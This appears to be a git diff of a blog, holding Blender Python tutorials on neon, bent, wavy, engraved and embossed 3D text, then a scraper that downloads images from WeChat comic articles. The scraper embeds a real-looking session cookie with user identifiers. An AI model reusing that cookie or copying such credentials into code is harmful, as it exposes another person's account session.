
1. Create a Text object and adjust its parameters:

import bpy
import numpy as np
import os

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"
text_obj.data.space_line = 1.2
2. Set the text:

text_obj.data.body = "BARBEQUE\nNATION"
3. Find a neon-style font at Neon Future Font | dafont.com and apply it:

font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath)), './fonts/Neon_Future.ttf'))
text_obj.data.font = bpy.data.fonts.load(font_path)
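One caveat: bpy.data.filepath is an empty string until the .blend file has been saved, so the relative path above would resolve incorrectly in a fresh session. A small guard (a sketch; falls back to the current working directory):

# Fall back to the CWD when the .blend has not been saved yet
base = os.path.dirname(bpy.data.filepath) or os.getcwd()
font_path = os.path.abspath(os.path.join(base, 'fonts', 'Neon_Future.ttf'))
text_obj.data.font = bpy.data.fonts.load(font_path)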
4. Set the extrude:

text_obj.data.extrude = 0.02
5. Add an emission material and set its parameters:

text_material = bpy.data.materials.new(name="Emission")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes

for node in nodes:
    nodes.remove(node)

emission_node = nodes.new(type='ShaderNodeEmission')
emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
emission_node.inputs[1].default_value = 4

output_node = nodes.new(type='ShaderNodeOutputMaterial')
links = text_material.node_tree.links
links.new(emission_node.outputs[0], output_node.inputs[0])

text_obj.data.materials.append(text_material)
6. Enable Bloom in the scene's Eevee settings:

bpy.context.scene.eevee.use_bloom = True
bpy.context.scene.eevee.bloom_radius = 3
bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
bpy.context.scene.eevee.bloom_intensity = 0.25
7. Create a plane to catch the neon light:

bpy.ops.mesh.primitive_plane_add()
plane_obj = bpy.context.object
plane_obj.rotation_euler[1] = np.pi / 2
plane_obj.scale[0] = 2.5
plane_obj.scale[1] = 3.5
plane_obj.location[0] = -0.25
8. Find a wall texture online and use it as the plane's texture:

plane_material = bpy.data.materials.new(name="Wall")
plane_material.use_nodes = True
nodes = plane_material.node_tree.nodes

image_texture_node = nodes.new(type='ShaderNodeTexImage')
image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath)), './texture/Wall.jpg')))
9. Adjust its shader nodes to rotate the texture mapping:

mapping_node = nodes.new(type='ShaderNodeMapping')
mapping_node.inputs[2].default_value[2] = np.pi / 2

texcoord_node = nodes.new(type="ShaderNodeTexCoord")

links = plane_material.node_tree.links
links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

plane_obj.data.materials.append(plane_material)
10. Add an Irradiance Volume light probe:

bpy.ops.object.lightprobe_add(type="GRID")
11. Scale the Light Probe so it encloses the plane and the text:

lightprobe_obj = bpy.context.object
lightprobe_obj.scale[0:3] = [1, 3.5, 2]
12. Bake Cubemap Only (this can also be triggered from script, as sketched below).
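A hedged way to run the bake from Python (assumes the Eevee light-cache operator of Blender 2.8x–3.x):

# Bake the Eevee light cache (irradiance volumes and reflection cubemaps)
bpy.ops.scene.light_cache_bake()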

Then set the World background strength to 0 and enable screen-space reflections:

bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
bpy.context.scene.eevee.use_ssr = True
13. Add point lights to supplement the brightness:

light_obj_list = []
for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
        light_obj_list[-1].location[1] = -2 + i
        light_obj_list[-1].location[2] = 0.5
    else:
        light_obj_list[-1].location[1] = -6 + i
        light_obj_list[-1].location[2] = -0.5

Complete code:

import bpy
import numpy as np
import os

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.rotation_euler[0] = np.pi / 2
text_obj.rotation_euler[2] = np.pi / 2
text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"
text_obj.data.space_line = 1.2

text_obj.data.extrude = 0.02

text_obj.data.body = "BARBEQUE\nNATION"
font_path = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath)), './fonts/Neon_Future.ttf'))
text_obj.data.font = bpy.data.fonts.load(font_path)

text_material = bpy.data.materials.new(name="Emission")
text_material.use_nodes = True
nodes = text_material.node_tree.nodes

for node in nodes:
    nodes.remove(node)

emission_node = nodes.new(type='ShaderNodeEmission')
emission_node.inputs[0].default_value = (0.25, 1, 0.325, 1)
emission_node.inputs[1].default_value = 4

output_node = nodes.new(type='ShaderNodeOutputMaterial')
links = text_material.node_tree.links
links.new(emission_node.outputs[0], output_node.inputs[0])

text_obj.data.materials.append(text_material)

bpy.context.scene.eevee.use_bloom = True
bpy.context.scene.eevee.bloom_radius = 3
bpy.context.scene.eevee.bloom_color = (0.25, 1, 0.325)
bpy.context.scene.eevee.bloom_intensity = 0.25

bpy.ops.mesh.primitive_plane_add()
plane_obj = bpy.context.object
plane_obj.rotation_euler[1] = np.pi / 2
plane_obj.scale[0] = 2.5
plane_obj.scale[1] = 3.5
plane_obj.location[0] = -0.25

plane_material = bpy.data.materials.new(name="Wall")
plane_material.use_nodes = True
nodes = plane_material.node_tree.nodes

image_texture_node = nodes.new(type='ShaderNodeTexImage')
image_texture_node.image = bpy.data.images.load(os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(bpy.data.filepath)), './texture/Wall.jpg')))

mapping_node = nodes.new(type='ShaderNodeMapping')
mapping_node.inputs[2].default_value[2] = np.pi / 2

texcoord_node = nodes.new(type="ShaderNodeTexCoord")

links = plane_material.node_tree.links
links.new(texcoord_node.outputs[0], mapping_node.inputs[0])
links.new(mapping_node.outputs[0], image_texture_node.inputs[0])
links.new(image_texture_node.outputs[0], nodes["Principled BSDF"].inputs[0])

plane_obj.data.materials.append(plane_material)

bpy.ops.object.lightprobe_add(type="GRID")
lightprobe_obj = bpy.context.object
lightprobe_obj.scale[0:3] = [1, 3.5, 2]

bpy.data.worlds["World"].node_tree.nodes["Background"].inputs[1].default_value = 0
bpy.context.scene.eevee.use_ssr = True

light_obj_list = []
for i in range(8):
    bpy.ops.object.light_add(type="POINT")
    light_obj_list.append(bpy.context.object)
    light_obj_list[-1].data.color = (0.25, 1, 0.325)
    if i < 5:
        light_obj_list[-1].location[1] = -2 + i
        light_obj_list[-1].location[2] = 0.5
    else:
        light_obj_list[-1].location[1] = -6 + i
        light_obj_list[-1].location[2] = -0.5
diff --git a/posts/Blender-Text Effects In Blender (7-12)/index.html b/posts/Blender-Text Effects In Blender (7-12)/index.html

import bpy
import os

# Add a cube and grab it as the object that will carry the text setup
bpy.ops.mesh.primitive_cube_add()
text_obj = bpy.context.object

# Create the Geometry Nodes modifier and its node group
text_modifier = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
bpy.ops.node.new_geometry_node_group_assign()
node_tree = text_modifier.node_group

# Remove the Group Input node
node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

# Create the String to Curves node
string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
string_to_curves_node.location = (-400, 50)

string_to_curves_node.align_x = "CENTER"
string_to_curves_node.align_y = "MIDDLE"
string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
string_to_curves_node.inputs[1].default_value = 2.2

string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.dirname(bpy.data.filepath), './fonts/Neon_Future.ttf')))

# Create the Resample Curve node
resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
resample_curve_node.location = (-150, 50)

resample_curve_node.mode = "EVALUATED"

# Create the Fill Curve node
fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
fill_curve_node.location = (50, 50)

# Create the Extrude Mesh node
extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
extrude_mesh_node.location = (250, 150)

extrude_mesh_node.inputs[3].default_value = 0.4
extrude_mesh_node.inputs[4].default_value = False

# Create the Flip Faces node
flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
flip_faces_node.location = (250, -100)

# Create the Join Geometry node
join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
join_geometry_node.location = (450, 50)

# Create the Realize Instances node
realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
realize_instances_node.location = (650, 50)

# Create the Merge by Distance node
merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
merge_by_distance_node.location = (850, 50)

# Get the Group Output node
output_node = node_tree.nodes.get("Group Output")
output_node.location = (1050, 50)

# Link the nodes
node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])
2. Next, add a Bevel modifier:

    text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
    text_modifier_bevel.width = 0.05
    text_modifier_bevel.segments = 5
    text_modifier_bevel.use_clamp_overlap = False
    text_modifier_bevel.harden_normals = True
3. Then add a Simple Deform modifier to bend the text:

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Z"

Full code:

import bpy
import os
import numpy as np

# Add a cube and grab it as the object that will carry the text setup
bpy.ops.mesh.primitive_cube_add()
text_obj = bpy.context.object

# Create the Geometry Nodes modifier and its node group
text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
bpy.ops.node.new_geometry_node_group_assign()
node_tree = text_modifier_geometrynodes.node_group

# Remove the Group Input node
node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

# Create the String to Curves node
string_to_curves_node = node_tree.nodes.new(type='GeometryNodeStringToCurves')
string_to_curves_node.location = (-400, 50)

string_to_curves_node.align_x = "CENTER"
string_to_curves_node.align_y = "MIDDLE"
string_to_curves_node.inputs[0].default_value = "Hello,\nWorld!"
string_to_curves_node.inputs[1].default_value = 2.2

string_to_curves_node.font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.dirname(bpy.data.filepath), './fonts/Neon_Future.ttf')))

# Create the Resample Curve node
resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
resample_curve_node.location = (-150, 50)

resample_curve_node.mode = "EVALUATED"

# Create the Fill Curve node
fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
fill_curve_node.location = (50, 50)

# Create the Extrude Mesh node
extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
extrude_mesh_node.location = (250, 150)

extrude_mesh_node.inputs[3].default_value = 0.4
extrude_mesh_node.inputs[4].default_value = False

# Create the Flip Faces node
flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
flip_faces_node.location = (250, -100)

# Create the Join Geometry node
join_geometry_node = node_tree.nodes.new(type='GeometryNodeJoinGeometry')
join_geometry_node.location = (450, 50)

# Create the Realize Instances node
realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
realize_instances_node.location = (650, 50)

# Create the Merge by Distance node
merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
merge_by_distance_node.location = (850, 50)

# Get the Group Output node
output_node = node_tree.nodes.get("Group Output")
output_node.location = (1050, 50)

# Link the nodes
node_tree.links.new(string_to_curves_node.outputs[0], resample_curve_node.inputs[0])
node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(flip_faces_node.outputs[0], join_geometry_node.inputs[0])
node_tree.links.new(join_geometry_node.outputs[0], realize_instances_node.inputs[0])
node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

# Add the Bevel modifier
text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
text_modifier_bevel.width = 0.05
text_modifier_bevel.segments = 5
text_modifier_bevel.use_clamp_overlap = False
text_modifier_bevel.harden_normals = True

# Add the Simple Deform modifier to bend the text
text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Z"

    [3.x] Create Multi-line Text Using Geometry Nodes In Blender | Easy Step-by-Step Tutorial

Adjust the previous Geometry Nodes setup so it can display multiple lines of text:

import bpy
import os
import numpy as np

# Add a cube and grab it as the object that will carry the text setup
bpy.ops.mesh.primitive_cube_add()
text_obj = bpy.context.object

# Create the Geometry Nodes modifier and its node group
text_modifier_geometrynodes = text_obj.modifiers.new(type='NODES', name="Geometry Nodes")
bpy.ops.node.new_geometry_node_group_assign()
node_tree = text_modifier_geometrynodes.node_group

# Remove the Group Input node
node_tree.nodes.remove(node_tree.nodes.get("Group Input"))

# Create the Special Characters node
special_characters_node = node_tree.nodes.new(type='FunctionNodeInputSpecialCharacters')
special_characters_node.location = (-800, 200)

# Create the String to Curves nodes
string_to_curves_nodes = []
for i in range(2):
    string_to_curves_nodes.append(node_tree.nodes.new(type='GeometryNodeStringToCurves'))
    string_to_curves_nodes[-1].location = (-400, 350 - 400 * i)
    string_to_curves_nodes[-1].align_x = "CENTER"
    string_to_curves_nodes[-1].align_y = "MIDDLE"
    string_to_curves_nodes[-1].inputs[1].default_value = 2.2
string_to_curves_nodes[0].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.dirname(bpy.data.filepath), './fonts/Neon_Future.ttf')))
string_to_curves_nodes[1].font = bpy.data.fonts.load(os.path.abspath(os.path.join(os.path.dirname(bpy.data.filepath), './fonts/Ourland.otf')))

# Create the Resample Curve node
resample_curve_node = node_tree.nodes.new(type='GeometryNodeResampleCurve')
resample_curve_node.location = (250, 50)

resample_curve_node.mode = "EVALUATED"

# Create the Fill Curve node
fill_curve_node = node_tree.nodes.new(type='GeometryNodeFillCurve')
fill_curve_node.location = (450, 50)

# Create the Extrude Mesh node
extrude_mesh_node = node_tree.nodes.new(type='GeometryNodeExtrudeMesh')
extrude_mesh_node.location = (650, 150)

extrude_mesh_node.inputs[3].default_value = 0.4
extrude_mesh_node.inputs[4].default_value = False

# Create the Flip Faces node
flip_faces_node = node_tree.nodes.new(type='GeometryNodeFlipFaces')
flip_faces_node.location = (650, -100)

# Create the Join Geometry nodes
join_geometry_nodes = []
for i in range(2):
    join_geometry_nodes.append(node_tree.nodes.new(type='GeometryNodeJoinGeometry'))
join_geometry_nodes[0].location = (50, 50)
join_geometry_nodes[1].location = (850, 50)

# Create the Realize Instances node
realize_instances_node = node_tree.nodes.new(type='GeometryNodeRealizeInstances')
realize_instances_node.location = (1050, 50)

# Create the Merge by Distance node
merge_by_distance_node = node_tree.nodes.new(type='GeometryNodeMergeByDistance')
merge_by_distance_node.location = (1250, 50)

# Get the Group Output node
output_node = node_tree.nodes.get("Group Output")
output_node.location = (1450, 50)

# Create the String nodes
string_nodes = []
for i in range(3):
    string_nodes.append(node_tree.nodes.new(type='FunctionNodeInputString'))
    string_nodes[-1].location = (-800, -150 * i + 50)
string_nodes[0].string = 'Taco'
string_nodes[1].string = 'Tuesday!'
string_nodes[2].string = 'gigigigigi~'

# Create the Join Strings node
join_strings_node = node_tree.nodes.new(type='GeometryNodeStringJoin')
join_strings_node.location = (-600, 75)

# Create the Set Position nodes
set_position_nodes = []
for i in range(2):
    set_position_nodes.append(node_tree.nodes.new(type='GeometryNodeSetPosition'))
    set_position_nodes[-1].location = (-150, -250 * i + 200)
set_position_nodes[0].inputs[3].default_value[1] = 2
set_position_nodes[1].inputs[3].default_value[1] = -1

# Link the nodes
node_tree.links.new(special_characters_node.outputs[0], join_strings_node.inputs[0])
node_tree.links.new(string_nodes[1].outputs[0], join_strings_node.inputs[1])
node_tree.links.new(string_nodes[0].outputs[0], join_strings_node.inputs[1])
node_tree.links.new(string_nodes[2].outputs[0], string_to_curves_nodes[1].inputs[0])
node_tree.links.new(join_strings_node.outputs[0], string_to_curves_nodes[0].inputs[0])
node_tree.links.new(string_to_curves_nodes[0].outputs[0], set_position_nodes[0].inputs[0])
node_tree.links.new(string_to_curves_nodes[1].outputs[0], set_position_nodes[1].inputs[0])
node_tree.links.new(set_position_nodes[0].outputs[0], join_geometry_nodes[0].inputs[0])
node_tree.links.new(set_position_nodes[1].outputs[0], join_geometry_nodes[0].inputs[0])
node_tree.links.new(join_geometry_nodes[0].outputs[0], resample_curve_node.inputs[0])
node_tree.links.new(resample_curve_node.outputs[0], fill_curve_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], extrude_mesh_node.inputs[0])
node_tree.links.new(fill_curve_node.outputs[0], flip_faces_node.inputs[0])
node_tree.links.new(extrude_mesh_node.outputs[0], join_geometry_nodes[1].inputs[0])
node_tree.links.new(flip_faces_node.outputs[0], join_geometry_nodes[1].inputs[0])
node_tree.links.new(join_geometry_nodes[1].outputs[0], realize_instances_node.inputs[0])
node_tree.links.new(realize_instances_node.outputs[0], merge_by_distance_node.inputs[0])
node_tree.links.new(merge_by_distance_node.outputs[0], output_node.inputs[0])

# Create the Bevel modifier
text_modifier_bevel = text_obj.modifiers.new(name="Bevel", type="BEVEL")
text_modifier_bevel.width = 0.05
text_modifier_bevel.segments = 5
text_modifier_bevel.use_clamp_overlap = False
text_modifier_bevel.harden_normals = True

# Create the Simple Deform modifier to bend the text
text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
text_modifier_simple_deform.deform_method = "BEND"
text_modifier_simple_deform.angle = -np.pi / 4
text_modifier_simple_deform.deform_axis = "Z"

    Create Wavy or Curvy Text In Blender | Easy Tutorial On Wave Modifier | Dancing Text | Waving Text

1. Create a new Text object and adjust its body text, Bevel, and Alignment:

    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
2. Give it a Wave modifier and tune its parameters to get a wavy animation effect:

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

Full code:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2
3. To stand the text upright, first convert it to a mesh:

bpy.ops.object.convert(target="MESH")
4. Delete the redundant edges: Mesh → Merge → By Distance:

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
5. Adjust its Rotation, then Object → Apply → All Transforms:

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()
6. Add the Wave modifier:

text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
text_modifier.height = 0.75
text_modifier.width = 5
text_modifier.narrowness = 1
text_modifier.start_position_x = 6
text_modifier.speed = 0.2

Full code:

    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.body = "Hello, World!"
    text_obj.data.extrude = 0.1
    text_obj.data.bevel_depth = 0.02
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    bpy.ops.object.convert(target="MESH")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.object.editmode_toggle()
    text_obj.rotation_euler[0] = np.pi / 2
    bpy.ops.object.transform_apply()

    text_modifier = text_obj.modifiers.new(name="Wave", type="WAVE")
    text_modifier.height = 0.75
    text_modifier.width = 5
    text_modifier.narrowness = 1
    text_modifier.start_position_x = 6
    text_modifier.speed = 0.2

    Easy Method to Engrave Your Text or Logo | How To Carve Any Text | 3D Text Effects In Blender

1. Create a new Text object, then set its body, Alignment, and Location:

    import bpy
    import os

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.location[2] = 0.15

    text_obj.data.extrude = 0.3
2. Convert it to a mesh:

    bpy.ops.object.convert(target="MESH")
3. In Edit Mode, press X and choose Limited Dissolve:

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.dissolve_limited()

4. Mesh → Merge → By Distance:

    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    bpy.ops.object.editmode_toggle()
5. Press E and drag upward to extrude:

    bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value":(0, 0, 0.3)})
    bpy.ops.object.editmode_toggle()
6. Create a new Cube and set its Scale:

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0:3] = [2.5, 1.2, 0.25]
7. Add a Boolean modifier:

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    bpy.ops.object.modifier_apply(modifier="Boolean")

    bpy.ops.object.transform_apply()
8. Set up the material and apply the Boolean:

cube_material = bpy.data.materials.new(name="Material")
cube_material.use_nodes = True
nodes = cube_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

cube_obj.data.materials.append(cube_material)
9. Apply the Scale:

    bpy.ops.object.transform_apply()
10. Add a Bevel modifier and set its parameters:

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.01
    cube_modifier_bevel.segments = 1
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    text_obj.hide_viewport = True
    text_obj.hide_render = True
11. Export in .glb format, which can be opened in 3D Viewer:

bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.dirname(bpy.data.filepath), './outputs/1')))

Full code:

import bpy
import os

bpy.ops.object.text_add()
text_obj = bpy.context.object

text_obj.data.align_x = "CENTER"
text_obj.data.align_y = "CENTER"

text_obj.data.body = "Hello,\nWorld!"

text_obj.location[2] = 0.15

# text_obj.data.extrude = 0.3

bpy.ops.object.convert(target="MESH")

bpy.ops.object.editmode_toggle()
bpy.ops.mesh.dissolve_limited()

bpy.ops.mesh.select_all(action="SELECT")
bpy.ops.mesh.remove_doubles(threshold=0.01)
bpy.ops.mesh.extrude_region_move(TRANSFORM_OT_translate={"value": (0, 0, 0.3)})
bpy.ops.object.editmode_toggle()

bpy.ops.mesh.primitive_cube_add()
cube_obj = bpy.context.object

cube_obj.scale[0:3] = [2.5, 1.2, 0.25]

cube_material = bpy.data.materials.new(name="Material")
cube_material.use_nodes = True
nodes = cube_material.node_tree.nodes
principled_bsdf = nodes.get("Principled BSDF")
if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (0, 0, 0, 1)

cube_obj.data.materials.append(cube_material)

cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cube_modifier_boolean.object = text_obj
bpy.ops.object.modifier_apply(modifier="Boolean")

bpy.ops.object.transform_apply()

cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
cube_modifier_bevel.width = 0.01
cube_modifier_bevel.segments = 1
cube_modifier_bevel.use_clamp_overlap = False
cube_modifier_bevel.harden_normals = True

text_obj.hide_viewport = True
text_obj.hide_render = True

bpy.ops.export_scene.gltf(filepath=os.path.abspath(os.path.join(os.path.dirname(bpy.data.filepath), './outputs/1')))

    Easy Method to Emboss Your Text or Logo | How To Create Raised Letters | 3D Text Effects In Blender

Hmm, this is pretty much the previous recipe with the Boolean operation changed from DIFFERENCE to UNION. If any faces come out broken, you have to repair them yourself:
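
The post gives no script for this variant, so here is a minimal sketch of the change, reusing cube_obj and text_obj from the engraving script above (operation is a standard Boolean-modifier property, and 'DIFFERENCE' is its default):

cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
cube_modifier_boolean.object = text_obj
cube_modifier_boolean.operation = 'UNION'  # the engraving version relied on the default 'DIFFERENCE'
bpy.ops.object.modifier_apply(modifier="Boolean")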

diff --git "a/posts/Book-\345\246\202\346\236\234\346\255\267\345\217\262\346\230\257\344\270\200\347\276\244\345\226\265/index.html" "b/posts/Book-\345\246\202\346\236\234\346\255\267\345\217\262\346\230\257\344\270\200\347\276\244\345\226\265/index.html"

Crawler

Save the URLs above into a list:

import re

# The given Markdown text
markdown_text = """
1. [如果历史是一群喵](https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA)
2. [如果历史是一群喵 | 祖先喵们的统一战争](https://mp.weixin.qq.com/s/HwkfqalZD7Ugvpt5lcPyuQ)
3. [吃饭穿衣,竟然都是皇上教的!](https://mp.weixin.qq.com/s/MRvf9c2_8RPX8ouSaNiP1Q)
4. [他年少丧父,被迫子承父业,最后靠湿身建立了一个国家](https://mp.weixin.qq.com/s/l-nWXU45sku88ML4NCjn7Q)
5. [天下都是我家哒!](https://mp.weixin.qq.com/s/PVl-eHCmZSMHLQhm_pRAvw)
6. [跟你讲一下三千多年前的狗血剧](https://mp.weixin.qq.com/s/VoNhyDXoy8Yg-cBCzDcdzg)
...
"""

# Extract every URL with a regular expression
urls = re.findall(r'\[.*?\]\((https?://[^\s]+)\)', markdown_text)
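
A quick sanity check on the extraction; the expected values below assume only the six sample links shown above:

print(len(urls))  # 6 for the sample text
print(urls[0])    # https://mp.weixin.qq.com/s/WVwlW3bhcirBSn2KjsMEYA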

Borrow the code from 利用Python爬取公众号上的图片(附源码), then hack away at it:

from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
import time
import random
import os

headers = {
    'cookie': 'pgv_pvid=6670082751; RK=WMxp6iw+3H; ptcz=831e2d5114bbf9b46ee7956fedb62717ee910417ecd992f3e0027f034213caf1; o_cookie=2925851543; pac_uid=1_2925851543; iip=0; tvfe_boss_uuid=94828b35f56c4131; LW_uid=01d6E8a1d0T8Y6S87134I123O2; eas_sid=J116c8t1G078b6f8N1u4m24059; LW_sid=6166y891k1d2s4h7v9M5A8K6e8; rewardsn=; wxtokenkey=777; wwapp.vid=; wwapp.cst=; wwapp.deviceid=',
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48'
}

index = 0

for url in urls:
    index += 1
    print("第 " + str(index) + ' 章')
    img_list = []  # so a failed request just skips this chapter
    try:
        response = requests.get(url, headers=headers)
        # print(response.status_code)  # response status code
        # Grab the page source
        html = response.text

        soup = BeautifulSoup(html, 'html.parser')
        img_list = soup.find_all('img')
    except Exception as e:
        print(f"{index}:错误 - {str(e)}")

    for img_url in tqdm(img_list):
        try:
            name = str(img_list.index(img_url))
            # print(img_url)
            img_link = img_url.get('data-src')
            if img_link is not None:
                # print(img_link)
                response2 = requests.get(img_link)
                # Images are binary data: use .content, not .text
                img_content = response2.content
                # Sleep a little so we don't get banned for requesting too fast
                time.sleep(random.uniform(3, 5))
                # Save the file
                folder_path = './如果历史是一群喵/' + '第 ' + str(index) + ' 章'
                if not os.path.exists(folder_path):
                    # Create the folder if it doesn't exist yet
                    os.makedirs(folder_path)
                with open(folder_path + '/' + name + '.' + img_link.split('=')[-1], 'wb+') as f:
                    f.write(img_content)
                # print(f'第 {name} 张图片下载成功')
        except Exception as e:
            print('第 ' + str(index) + ' 章:错误:' + str(e))

Formatting

The data was cleaned up by hand here: the .gif images at the start of some chapters were replaced with .jpeg versions, and the broken file-name extensions after chapter 162 were fixed as well.

import os

def rename_files_in_folder(folder_path):
    # Walk every file in the folder
    for filename in os.listdir(folder_path):
        # Build the full file path
        old_file = os.path.join(folder_path, filename)

        if os.path.isfile(old_file):
            # If the extension is .appmsg, change it to .jpeg
            if filename.endswith('.appmsg'):
                new_file = os.path.join(folder_path, filename.replace('.appmsg', '.jpeg'))
                os.rename(old_file, new_file)

            # If the extension is .1, change it to .gif
            elif filename.endswith('.1'):
                new_file = os.path.join(folder_path, filename.replace('.1', '.gif'))
